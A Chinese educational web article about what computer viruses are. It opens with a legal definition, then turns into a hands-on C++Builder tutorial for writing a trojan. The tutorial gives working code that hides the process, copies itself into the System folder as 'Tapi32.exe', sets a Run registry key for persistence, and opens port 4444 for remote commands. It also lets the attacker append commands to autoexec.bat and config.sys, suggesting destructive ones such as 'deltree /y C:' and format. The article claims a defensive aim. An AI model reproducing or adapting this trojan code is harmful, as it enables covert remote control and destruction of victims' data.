計算機病毒實質是什么呢

計算機病毒實質是什么呢

　　計算機病毒的實質是什么，你有去了解過嗎?下面由學習啦小編給你做出詳細的計算機病毒實質說明介紹!希望對你有幫助!

　　計算機病毒實質說明一：

　　計算機病毒(ComputerVirus)實質：是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數據，影響計算機使用，并能自我復制的一組計算機指令或者程序代碼。計算機病毒是指能夠影響破壞計算機正常工作的、人為編制的、可自我復制的一組計算機指令或程序。

　　(注：《中華人民共和國計算機信息系統安全保護條例》)

　　計算機病毒利用系統硬件或軟件的缺陷進入計算機中，通過不斷地自身復制，占據存儲空間，影響或降低計算機性能、破壞或使其癱瘓。此外，計算機病毒還可以將自身附著在不同類型的文件上，使其作為病毒的載體，通過染毒文件的傳播與傳送，達到破壞計算機文件和系統的目的，給計算機用戶帶來麻煩，造成其信息財產的巨大損失。

　　計算機病毒實質說明二：

　　木馬一定是由兩部分組成——服務器程序(Server)和客戶端程序(Client)，服務器負責打開攻擊的道路，就像一個內奸特務;客戶端負責攻擊目標，兩者需要一定的網絡協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術并順便編寫一個例子木馬，使大家能更好地防范和查殺各種已知和未知的木馬。

　　首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder(以下簡稱BCB);VC雖然好，但GUI設計太復雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB;Delphi也不錯，但缺陷是不能繼承已有的資源(如“死牛崇拜”黑客小組公布的BO2000源代碼，是VC編寫的，網上俯拾皆是);VB嘛，談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎?

　　啟動C++Builder 5.0企業版，新建一個工程，添加三個VCL控件：一個是Internet頁中的Server Socket，另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個服務器程序，可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的，后來微軟將它引入了Windows中(包括Win98和WinNt);后兩個控件的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能，大家一看都知道是使軟件具有上傳下載功能和發郵件功能的控件。

　　Form窗體是可視的，這當然是不可思議的。不光占去了大量的空間(光一個Form就有300K之大)，而且使軟件可見，根本沒什么作用。因此實際寫木馬時可以用一些技巧使程序不包含Form，就像Delphi用過程實現的小程序一般只有17K左右那樣。

　　我們首先應該讓我們的程序能夠隱身。雙擊Form，首先在FormCreate事件中添加可使木馬在Win9x的“關閉程序”對話框中隱藏的代碼。這看起來很神秘，其實說穿了不過是一種被稱之為Service的后臺進程,它可以運行在較高的優先級下,可以說是非?？拷到y核心的設備驅動程序中的那一種。因此，只要將我們的程序在進程數據庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有，那么我們只好自己來聲明這個位于KERNEL32.DLL中的鳥函數了。

　　首先判斷目標機的操作系統是Win9x還是WinNt：

　　{

　　DWORD dwVersion = GetVersion();

　　// 得到操作系統的版本號

　　if (dwVersion >= 0x80000000)

　　// 操作系統是Win9x，不是WinNt

　　{

　　typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

　　file://定/義RegisterServiceProcess()函數的原型

　　HINSTANCE hDLL;

　　LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

　　hDLL = LoadLibrary("KERNEL32");

　　file://加/載RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL

　　lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

　　file://得/到RegisterServiceProcess()函數的地址

　　lpRegisterServiceProcess(GetCurrentProcessId(),1);

　　file://執/行RegisterServiceProcess()函數,隱藏本進程

　　FreeLibrary(hDLL);

　　file://卸/載動態鏈接庫

　　}

　　}

　　這樣就終于可以隱身了(害我敲了這么多代碼!)。為什么要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余，因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法，這個留到后面再講)。接著再將自己拷貝一份到%System%目錄下，例如：

　　C:\Windows\System，并修改注冊表，以便啟動時自動加載：

　　{

　　char TempPath[MAX_PATH];

　　file://定/義一個變量

　　GetSystemDirectory(TempPath ,MAX_PATH);

　　file://TempPath/是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小，得到目標機的System目錄路徑

　　SystemPath=AnsiString(TempPath);

　　file://格/式化TempPath字符串，使之成為能供編譯器使用的樣式

　　CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\Tapi32.exe").c_str() ,FALSE);

　　file://將/自己拷貝到%System%目錄下，并改名為Tapi32.exe，偽裝起來

　　Registry=new TRegistry;

　　file://定/義一個TRegistry對象，準備修改注冊表，這一步必不可少

　　Registry->RootKey=HKEY_LOCAL_MACHINE;

　　file://設/置主鍵為HKEY_LOCAL_MACHINE

　　Registry->OpenKey("Software\Microsoft\Windows\CurrentVersion\Run",TRUE);

　　file://打/開鍵值Software\Microsoft\Windows\CurrentVersion\Run，如果不存在，就創建之

　　try

　　{

　　file://如/果以下語句發生異常，跳至catch，以避免程序崩潰

　　if(Registry->ReadString("crossbow")!=SystemPath+"\Tapi32.exe")

　　Registry->WriteString("crossbow",SystemPath+"\Tapi32.exe");

　　file://查/找是否有“crossbow”字樣的鍵值，并且是否為拷貝的目錄%System%+Tapi32.exe

　　file://如/果不是，就寫入以上鍵值和內容

　　}

　　catch(...)

　　{

　　file://如/果有錯誤，什么也不做

　　}

　　}

　　好，FormCreate過程完成了，這樣每次啟動都可以自動加載Tapi32.exe，并且在“關閉程序”對話框中看不見本進程了，木馬的雛形初現。

　　接著選中ServerSocket控件，在左邊的Object Inspector中將Active改為true，這樣程序一啟動就打開特定端口，處于服務器工作狀態。再將Port填入4444，這是木馬的端口號，當然你也可以用別的。但是你要注意不要用1024以下的低端端口，因為這樣不但可能會與基本網絡協議使用的端口相沖突，而且很容易被發覺，因此盡量使用1024以上的高端端口(不過也有這樣一種技術，它故意使用特定端口，因為如果引起沖突，Windows也不會報錯 ^_^)。你可以看一看TNMFTP控件使用的端口，是21號端口，這是FTP協議的專用控制端口(FTP Control Port);同理TNMSMTP的25號端口也是SMTP協議的專用端口。

　　再選中ServerSocket控件，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：

　　{

　　FILE *fp=NULL;

　　char * content;

　　int times_of_try;

　　char TempFile[MAX_PATH];

　　file://定/義了一堆待會兒要用到的變量

　　sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\Win369.BAT")).c_str());

　　file://在%System%下/建立一個文本文件Win369.bat，作為臨時文件使用

　　AnsiString temp=Socket->ReceiveText();

　　file://接/收客戶端(攻擊者，也就是你自己)傳來的數據

　　}

　　好，大門敞開了!接著就是修改目標機的各種配置了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧：

　　{

　　if(temp.SubString(0,9)=="edit conf")

　　file://如/果接受到的字符串的前9個字符是“edit conf”

　　{

　　int number=temp.Length();

　　file://得/到字符串的長度

　　int file_name=atoi((temp.SubString(11,1)).c_str());

　　file://將/第11個字符轉換成integer型，存入file_name變量

　　file://為/什么要取第11個字符，因為第10個字符是空格字符

　　content=(temp.SubString(12,number-11)+'\n').c_str();

　　file://余/下的字符串將被作為寫入的內容寫入目標文件

　　FILE *fp=NULL;

　　char filename[20];

　　chmod("c:\autoexec.bat",S_IREAD|S_IWRITE);

　　chmod("c:\config.sys",S_IREAD|S_IWRITE);

　　file://將/兩個目標文件的屬性改為可讀可寫

　　if(file_name==1)

　　sprintf(filename,"%s","c:\autoexec.bat");

　　file://如/果第11個字符是1,就把Autoexec.bat格式化

　　else if(file_name==2)

　　sprintf(filename,"%s","c:\config.sys");

　　file://如/果第11個字符是1,就把Config.sys格式化

　　times_of_try=0;

　　file://定/義計數器

　　while(fp==NULL)

　　{

　　file://如/果指針是空

　　fp=fopen(filename,"a+");

　　file://如/果文件不存在，創建之;如果存在，準備在其后添加

　　file://如/果出錯，文件指針為空，這樣就會重復

　　times_of_try=times_of_try+1;

　　file://計/數器加1

　　if(times_of_try>100)

　　{

　　file://如/果已經試了100次了，仍未成功

　　Socket->SendText("Fail By Open File");

　　file://就/發回“Fail By Open File”的錯誤信息

　　goto END;

　　file://跳/至END處

　　}

　　}

　　fwrite(content,sizeof(char),strlen(content),fp);

　　file://寫/入添加的語句，例如deltree/y C:或者format/q/autotest C:，夠毒吧?!

　　fclose(fp);

　　file://寫/完后關閉目標文件

　　Socket->SendText("Sucess");

　　file://然/后發回“Success”的成功信息

　　}

　　}

　　你現在可以通過網絡來察看目標機上的這兩個文件了，并且還可以向里面隨意添加任何命令。

　　看了“計算機病毒實質是什么呢 ”文章的還看了：

1.計算機病毒實質是什么

2.計算機病毒本質是什么

3.計算機病毒的本質是什么

4.計算機病毒是什么

5.計算機病毒定義是什么

6.計算機病毒產生原因是什么